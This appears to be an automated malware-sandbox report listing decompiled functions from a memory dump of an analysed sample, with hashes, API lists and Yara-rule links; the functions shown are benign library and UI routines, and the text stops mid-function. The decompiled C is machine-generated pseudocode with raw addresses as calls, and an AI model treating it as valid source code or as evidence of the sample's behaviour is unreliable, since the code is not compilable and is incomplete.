Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: DragDelay$DragMinDist$dk$windows
API String ID: 3965097884-4228829393
Opcode ID: c50f79ce0adc857029fb9407ced14f8dbf50bd8db2cd6d20b8cc150b793a0201
Instruction ID: 27f9c4a9d2fc78eba2063e5def23805cc082716089017347b6df044bfa9b673f
Opcode Fuzzy Hash: c50f79ce0adc857029fb9407ced14f8dbf50bd8db2cd6d20b8cc150b793a0201
Instruction Fuzzy Hash: CC011AB0A40705AFD790EF759D86B957AE0FB08700F90A529E108E7A91D7B894548F54

Uniqueness

Uniqueness Score: -1.00%

Function 00D3302F Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00D3302F(intOrPtr* __ecx, signed int __edx, struct tagLOGFONTW __fp0) {
				signed int _v8;
				struct _OSVERSIONINFOEXW _v292;
				void* __ebp;
				signed int _t11;
				signed int _t12;
				void* _t14;
				longlong _t15;
				void* _t21;
				intOrPtr* _t33;
				intOrPtr* _t38;
				signed int _t39;

				_t31 = __edx;
				_t11 =  *0xf02790; // 0x8cab593a
				_t12 = _t11 ^ _t39;
				_v8 = _t12;
				_t33 = __ecx;
				if( *__ecx == 0) {
					_v292.dwOSVersionInfoSize = 0x11c;
					_v292.dwMajorVersion = 6;
					_v292.dwMinorVersion = 1;
					0xe23f30( &(_v292.dwBuildNumber), 0, 0x110, _t21);
					_t38 =  *0xe8e324;
					_t14 =  *_t38(0, 0, 2, 3, 1, 3);
					_t15 =  *_t38(_t14, __edx);
					_push(__edx);
					 *((intOrPtr*)(_t33 + 0x17c)) = VerifyVersionInfoW( &_v292, 3, _t15);
					 *((intOrPtr*)(_t33 + 0x180)) = GetSystemMetrics(0x1000);
					E00D3398F(_t33, _t31); // executed
					E00D3347C(_t33, _t31, __fp0); // executed
					_t12 = E00D33114(_t33);
					 *((intOrPtr*)(_t33 + 0x19c)) = 1;
				}
				0xe2142c();
				return _t12;
			}

0x00d3302f
0x00d33038
0x00d3303d
0x00d3303f
0x00d33044
0x00d3304a
0x00d33058
0x00d33068
0x00d33075
0x00d3307b
0x00d3308c
0x00d33092
0x00d33096
0x00d33098
0x00d330ae
0x00d330bc
0x00d330c2
0x00d330c9
0x00d330d0
0x00d330d5
0x00d330db
0x00d330e3
0x00d330eb

APIs

_memset.LIBCMT ref: 00D3307B
VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 00D33092
VerSetConditionMask.NTDLL(00000000), ref: 00D33096
VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00D330A3
GetSystemMetrics.USER32(00001000), ref: 00D330B4

Part of subcall function 00D3398F: __EH_prolog3.LIBCMT ref: 00D33996
Part of subcall function 00D3398F: GetSysColor.USER32(00000016), ref: 00D339A8
Part of subcall function 00D3398F: GetSysColor.USER32(0000000F), ref: 00D339B5
Part of subcall function 00D3398F: GetSysColor.USER32(00000015), ref: 00D339C8
Part of subcall function 00D3398F: GetSysColor.USER32(0000000F), ref: 00D339D0
Part of subcall function 00D3398F: GetSysColor.USER32(0000000F), ref: 00D33A04
Part of subcall function 00D3398F: GetSysColor.USER32(00000010), ref: 00D33A0E
Part of subcall function 00D3398F: GetSysColor.USER32(00000015), ref: 00D33A18
Part of subcall function 00D3398F: GetSysColor.USER32(00000016), ref: 00D33A22
Part of subcall function 00D3398F: GetSysColor.USER32(00000014), ref: 00D33A2C
Part of subcall function 00D3398F: GetSysColor.USER32(00000012), ref: 00D33A36
Part of subcall function 00D3398F: GetSysColor.USER32(00000011), ref: 00D33A40
Part of subcall function 00D3398F: GetSysColor.USER32(00000006), ref: 00D33A47
Part of subcall function 00D3398F: GetSysColor.USER32(0000000D), ref: 00D33A4E
Part of subcall function 00D3398F: GetSysColor.USER32(0000000E), ref: 00D33A55
Part of subcall function 00D3398F: GetSysColor.USER32(00000005), ref: 00D33A5C
Part of subcall function 00D3398F: GetSysColor.USER32(00000008), ref: 00D33A66
Part of subcall function 00D3398F: GetSysColor.USER32(00000009), ref: 00D33A6D
Part of subcall function 00D3398F: GetSysColor.USER32(00000007), ref: 00D33A74
Part of subcall function 00D3398F: GetSysColor.USER32(00000002), ref: 00D33A7B
Part of subcall function 00D3398F: GetSysColor.USER32(00000003), ref: 00D33A82
Part of subcall function 00D3398F: GetSysColor.USER32(0000001B), ref: 00D33A8C
Part of subcall function 00D3398F: GetSysColor.USER32(0000001C), ref: 00D33A96

Part of subcall function 00D3347C: __EH_prolog3_GS.LIBCMT ref: 00D33486
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33516
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33530
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D3354A
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33564
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D3357E
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33598
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D335B2

Part of subcall function 00D33114: GetSystemMetrics.USER32(00000031), ref: 00D33128
Part of subcall function 00D33114: GetSystemMetrics.USER32(00000032), ref: 00D33132
Part of subcall function 00D33114: SetRectEmpty.USER32(?), ref: 00D33141
Part of subcall function 00D33114: EnumDisplayMonitors.USER32(00000000,00000000,00D32FAA,?,?,770E9FF0,00000001,00D330D5), ref: 00D33151
Part of subcall function 00D33114: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D33168
Part of subcall function 00D33114: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 00D33190
Part of subcall function 00D33114: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 00D331A6
Part of subcall function 00D33114: SystemParametersInfoW.USER32 ref: 00D331C8

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$ConditionMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion_memset
String ID:
API String ID: 3574155688-0
Opcode ID: ac5b37fafbb4dced2d14f870876174fa1e6242a1a2441bca0d98956b603630d3
Instruction ID: da04269eb8f0360266398c5a16240c99f463280597a574d43d0e55fe7ef2d6ae
Opcode Fuzzy Hash: ac5b37fafbb4dced2d14f870876174fa1e6242a1a2441bca0d98956b603630d3
Instruction Fuzzy Hash: 48119171A00218AFDB25AF65AC46BEAFBBCEB49710F00015AB509A7281CB705E148FE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E25A96 Relevance: 6.1, APIs: 4, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memmove.LIBCMT ref: 00E25B2C
__flush.LIBCMT ref: 00E25B4C
__write.LIBCMT ref: 00E25B7F
__flsbuf.LIBCMT ref: 00E25BAD

Part of subcall function 00E29047: __getptd_noexit.LIBCMT ref: 00E29047

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 5d7ec6c4083b31187eb5df1e419ad43d562cb844b91ff7dc2d52efaec9845785
Instruction ID: 0a464f4011cf1bcb0fb7fca94e27d712e0dcf8bd03afce0799dda89cf000d432
Opcode Fuzzy Hash: 5d7ec6c4083b31187eb5df1e419ad43d562cb844b91ff7dc2d52efaec9845785
Instruction Fuzzy Hash: 1C410772B00F299FDB188F69EAD19AE77A5EF45364F24A23DE415E7240EB70DD408B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E56ED3 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00E56EDA
std::_Cnd_waitX.LIBCPMT ref: 00E56EFA

Part of subcall function 00E51764: __Mtx_init.LIBCPMT ref: 00E5176E

std::_Cnd_initX.LIBCPMT ref: 00E56F33
std::_Cnd_initX.LIBCPMT ref: 00E56F5B

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$Cnd_init$Cnd_waitH_prolog3Mtx_init
String ID:
API String ID: 2294004850-0
Opcode ID: ba62a233e4c96b2175eb9a39bbd42abcab7d163b4c71f120453c5ec50ce30c5f
Instruction ID: 349cd41762398f72883e1a7954e64ee078d8ecd6fa0b8396c1cf9404a1680ae5
Opcode Fuzzy Hash: ba62a233e4c96b2175eb9a39bbd42abcab7d163b4c71f120453c5ec50ce30c5f
Instruction Fuzzy Hash: A401FC70F002546BCB10EF29AD8279973D0BB15725F02A569FC14FB291DB30CE049B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E56FFF Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00E57006
std::_Cnd_waitX.LIBCPMT ref: 00E57026

Part of subcall function 00E51764: __Mtx_init.LIBCPMT ref: 00E5176E

std::_Cnd_initX.LIBCPMT ref: 00E5705F
std::_Cnd_initX.LIBCPMT ref: 00E57087

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$Cnd_init$Cnd_waitH_prolog3Mtx_init
String ID:
API String ID: 2294004850-0
Opcode ID: b98993a349d2566b2a40f96ab9ef2dc59aec34ad5f90fbbbbe332d1cd087235d
Instruction ID: 69e62ebb165d09d73780646e3c3f93a1d3ceaa392d8d6b1f401d317d77efa278
Opcode Fuzzy Hash: b98993a349d2566b2a40f96ab9ef2dc59aec34ad5f90fbbbbe332d1cd087235d
Instruction Fuzzy Hash: AD01F7B0E41364ABCB20EB287D8279933D0BB05329F116969FC59FB2C2CB708E019B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E6CFA7 Relevance: 6.0, APIs: 4, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCMT ref: 00E6CFCA

Part of subcall function 00E75D5A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCMT ref: 00E75D81
Part of subcall function 00E75D5A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 00E75D98
Part of subcall function 00E75D5A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCMT ref: 00E75DFB
Part of subcall function 00E75D5A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCMT ref: 00E75E03

Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00E6CFE2
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00E6CFEC
__CxxThrowException@8.LIBCMT ref: 00E6D00C

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::details::Context$Base::$Internal$Scheduler$AvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushThrowVirtualWork
String ID:
API String ID: 2737591251-0
Opcode ID: 04f13102462142c294b01ddd2a11b46af48d63877764e6986a0610195daa30b0
Instruction ID: 0614620b59a2aa3ea5930d94969d7d3175e476ae394e7bd2043e973f58a19b82
Opcode Fuzzy Hash: 04f13102462142c294b01ddd2a11b46af48d63877764e6986a0610195daa30b0
Instruction Fuzzy Hash: C3F05032B4012867CB21B665F81287EF3E94FD0790F54612AF815B3251EF709F1147C1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0E1D5 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E00D0E1D5(void* __ecx) {
				intOrPtr _t5;
				int _t9;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				intOrPtr* _t19;

				_t15 = __ecx;
				_t5 =  *((intOrPtr*)( *0xe8e80c))(0xb); // executed
				 *((intOrPtr*)(__ecx + 8)) = _t5;
				 *((intOrPtr*)(_t15 + 0xc)) = GetSystemMetrics(0xc);
				 *0xf0b3a8 = GetSystemMetrics(2) + 1;
				_t9 = GetSystemMetrics(3);
				 *0xf0b3ac = _t9 + 1;
				_t11 =  *0xe8e808(0);
				_t19 =  *0xe8e184; // 0x72e5ad70
				_t17 = _t11;
				_t12 =  *_t19(_t17, 0x58);
				 *((intOrPtr*)(_t15 + 0x18)) = _t12;
				_t13 =  *_t19(_t17, 0x5a);
				 *((intOrPtr*)(_t15 + 0x1c)) = _t13;
				return  *0xe8e804(0, _t17);
			}

0x00d0e1dd
0x00d0e1e2
0x00d0e1e6
0x00d0e1ed
0x00d0e1f5
0x00d0e1fa
0x00d0e1ff
0x00d0e204
0x00d0e20a
0x00d0e210
0x00d0e215
0x00d0e21a
0x00d0e21d
0x00d0e222
0x00d0e22e

APIs

KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00D0E1E2
GetSystemMetrics.USER32(0000000C), ref: 00D0E1E9
GetSystemMetrics.USER32(00000002), ref: 00D0E1F0
GetSystemMetrics.USER32(00000003), ref: 00D0E1FA

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: MetricsSystem$CallbackDispatcherUser
String ID:
API String ID: 4241121291-0
Opcode ID: e328708cb6f32b472d1b90085567269e73617915e866399ef353e50fdaa3fec2
Instruction ID: e64036a80faa394cf647a4aa419947ec4322af97b08e0f6292a82b4092a3c062
Opcode Fuzzy Hash: e328708cb6f32b472d1b90085567269e73617915e866399ef353e50fdaa3fec2
Instruction Fuzzy Hash: 9FF0BD71E40314AEEB145F729C8DB2B7FA4EB45B61F144456EA04AF291D6B588058FD0

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F3B3 Relevance: 6.0, APIs: 4, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00E73DDC
Concurrency::details::_NonReentrantLock::_Acquire.LIBCMT ref: 00E73DE9
Concurrency::details::Etw::Etw.LIBCMT ref: 00E73E09
Concurrency::details::Etw::RegisterGuids.LIBCMT ref: 00E73E2F

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::details::Etw::$AcquireConcurrency::details::_GuidsH_prolog3Lock::_ReentrantRegister
String ID:
API String ID: 3171971413-0
Opcode ID: dc2ddde0805afefd17efa77b49f9f9d1afecd57dfa6e50f4615786535342b978
Instruction ID: be866c1644b1daf74eb6179db59400b2201ec3fb9022f24f3a73a86ac0f96219
Opcode Fuzzy Hash: dc2ddde0805afefd17efa77b49f9f9d1afecd57dfa6e50f4615786535342b978
Instruction Fuzzy Hash: D4F0E260744348A6EBA4FB74AC07BA935D0AB4075AF40E16DA10C7A2C1CFF98F00B306

Uniqueness

Uniqueness Score: -1.00%

Function 00E67F7F Relevance: 6.0, APIs: 4, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00E6AC3F,0000FFFF,00000000,?,00000000), ref: 00E67F89
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00E6AC3F,0000FFFF,00000000,?,00000000,?), ref: 00E67F93
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E67FB2
__CxxThrowException@8.LIBCMT ref: 00E67FC0

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: 85c3f0158a6c270f3c889ddbf263de7adf39c95a1f5342e943b24cc174722409
Instruction ID: f9d7594d638437d0b9e9f48b8fb6b3ca227414db03d351c455da631ab3315cc5
Opcode Fuzzy Hash: 85c3f0158a6c270f3c889ddbf263de7adf39c95a1f5342e943b24cc174722409
Instruction Fuzzy Hash: 67E092347442099B8B10FBB5EA0AEBE73EC5B00344B6011A1B99DF2140EA34DE0487A3

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3949 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00CA3949(intOrPtr* __ecx) {
				void* _t32;
				intOrPtr* _t43;
				intOrPtr* _t51;
				void* _t52;

				0xe214d0(8);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = 0;
				_t53 =  *((intOrPtr*)(_t52 + 0x14));
				if( *((intOrPtr*)(_t52 + 0x14)) != 0) {
					 *__ecx = 0xe93bcc;
					 *((intOrPtr*)(__ecx + 0x70)) = 0xe92c2c;
					 *((intOrPtr*)(_t52 - 4)) = 0;
					 *((intOrPtr*)(_t52 - 0x10)) = 1;
				}
				_push(0);
				_push(0);
				_t50 = _t51 + 0x10;
				_push(_t51 + 0x10); // executed
				E00CA3AEB(_t51); // executed
				 *((intOrPtr*)(_t52 - 4)) = 1;
				 *((intOrPtr*)(_t51 +  *((intOrPtr*)( *_t51 + 4)))) = 0xe93bc8;
				_t12 =  *((intOrPtr*)( *_t51 + 4)) - 0x70; // -111
				 *((intOrPtr*)( *((intOrPtr*)( *_t51 + 4)) + _t51 - 4)) = _t12;
				E00CA3910(_t51 + 0x10, _t53, 0);
				_t43 =  *((intOrPtr*)(_t52 + 8));
				 *((char*)(_t52 - 4)) = 2;
				if( *((intOrPtr*)(_t43 + 0x14)) >= 8) {
					_t43 =  *_t43;
				}
				_push( *((intOrPtr*)(_t52 + 0x10)));
				_push( *(_t52 + 0xc) | 0x00000001);
				_push(_t43);
				_t32 = E00CA9AAE(_t50); // executed
				if(_t32 == 0) {
					_t49 =  ==  ?  *( *((intOrPtr*)( *_t51 + 4)) + _t51 + 0xc) | 6 :  *( *((intOrPtr*)( *_t51 + 4)) + _t51 + 0xc) | 0x00000002;
					E00CA77A4( *((intOrPtr*)( *_t51 + 4)) + _t51,  ==  ?  *( *((intOrPtr*)( *_t51 + 4)) + _t51 + 0xc) | 6 :  *( *((intOrPtr*)( *_t51 + 4)) + _t51 + 0xc) | 0x00000002, 0);
				}
				0xe2149e();
				return _t51;
			}

0x00ca3950
0x00ca3955
0x00ca3957
0x00ca395c
0x00ca395f
0x00ca3962
0x00ca3964
0x00ca396a
0x00ca3971
0x00ca3974
0x00ca3974
0x00ca397b
0x00ca397c
0x00ca397d
0x00ca3982
0x00ca3983
0x00ca398b
0x00ca3995
0x00ca39a1
0x00ca39a4
0x00ca39aa
0x00ca39af
0x00ca39b2
0x00ca39ba
0x00ca39bc
0x00ca39bc
0x00ca39be
0x00ca39c7
0x00ca39c8
0x00ca39cb
0x00ca39d2
0x00ca39ea
0x00ca39ee
0x00ca39ee
0x00ca39f5
0x00ca39fa

APIs

__EH_prolog3.LIBCMT ref: 00CA3950
std::ios_base::clear.LIBCPMT ref: 00CA39EE

Strings

,,, xrefs: 00CA396A

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3std::ios_base::clear
String ID: ,,
API String ID: 973902081-1556401989
Opcode ID: 0c7771457603efd25b7baa04307380602faaa0586cb3505a333b758505e7c5bd
Instruction ID: 1765405feb4f783cf7d03652ed58dd61dd6c83c95c5a42c62ec794d43db96d97
Opcode Fuzzy Hash: 0c7771457603efd25b7baa04307380602faaa0586cb3505a333b758505e7c5bd
Instruction Fuzzy Hash: ED216A706002059FDB24DF68C89596EB7F5FF85308B10885DF486AB341C7B1DE02DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00CA3B57(intOrPtr* __ecx) {
				void* _t31;
				intOrPtr* _t48;
				void* _t50;

				0xe214d0(8);
				_t48 = __ecx;
				 *((intOrPtr*)(_t50 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t50 - 0x10)) = 0;
				_t51 =  *((intOrPtr*)(_t50 + 0x14));
				if( *((intOrPtr*)(_t50 + 0x14)) != 0) {
					 *__ecx = 0xe93bdc;
					 *((intOrPtr*)(__ecx + 0x60)) = 0xe92c2c;
					 *((intOrPtr*)(_t50 - 4)) = 0;
					 *((intOrPtr*)(_t50 - 0x10)) = 1;
				}
				_push(0);
				_push(0);
				_push(_t48 + 4);
				E00CA3C02(_t48);
				 *((intOrPtr*)(_t50 - 4)) = 1;
				 *((intOrPtr*)(_t48 +  *((intOrPtr*)( *_t48 + 4)))) = 0xe93bd8;
				_t12 =  *((intOrPtr*)( *_t48 + 4)) - 0x60; // -95
				 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4)) + _t48 - 4)) = _t12;
				E00CA3910(_t48 + 4, _t51, 0);
				_push( *((intOrPtr*)(_t50 + 0x10)));
				 *((char*)(_t50 - 4)) = 2;
				_push( *(_t50 + 0xc) | 0x00000002);
				_push( *((intOrPtr*)(_t50 + 8)));
				_t31 = E00CA9AAE(_t48 + 4); // executed
				if(_t31 == 0) {
					_t47 =  ==  ?  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 6 :  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 0x00000002;
